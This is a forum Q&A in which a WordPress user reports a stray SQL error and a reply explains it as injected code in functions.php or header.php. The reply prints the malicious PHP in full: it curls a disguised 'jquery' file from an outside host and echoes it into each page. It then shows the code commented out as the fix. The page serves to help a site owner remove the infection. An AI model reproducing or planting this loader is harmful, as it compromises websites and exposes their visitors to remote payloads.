Mobile app version of vmapp.org
Login or Join
Caterina187

: SQL statscurl_id Error using Wordpress I get this error at the bottom of my home page. please let me know why this error appeared in my website. I am running my website on wordpress. Here is

@Caterina187

Posted in: #Jquery #Php #Wordpress

I get this error at the bottom of my home page. please let me know why this error appeared in my website.
I am running my website on wordpress.
Here is the error

Couldn't connect to database server.Couldn't find database cjquery.An unexpected problem has occured with the application.
SELECT statscurl_id FROM `statscurl` WHERE statscurl_ip = '';

10.01% popularity Vote Up Vote Down


Login to follow query

More posts by @Caterina187

1 Comments

Sorted by latest first Latest Oldest Best

 

@Speyer207

Login to the WordPress dashboard
Click appearance and then editor
Look in functions.php or header.php for the code below:



SOURCE

<?php
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);

curl_close($ch);
echo "$data";
}
?>



Remove the code or comment it out so it looks something like this:

<?php
// if(function_exists('curl_init'))
// {
// $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
// $ch = curl_init();
// $timeout = 5;

// curl_setopt($ch,CURLOPT_URL,$url);
// curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
// curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
// $data = curl_exec($ch);

// curl_close($ch);
// echo "$data";
//}
?>


The above string can vary from site to site.

10% popularity Vote Up Vote Down


Back to top | Use Dark Theme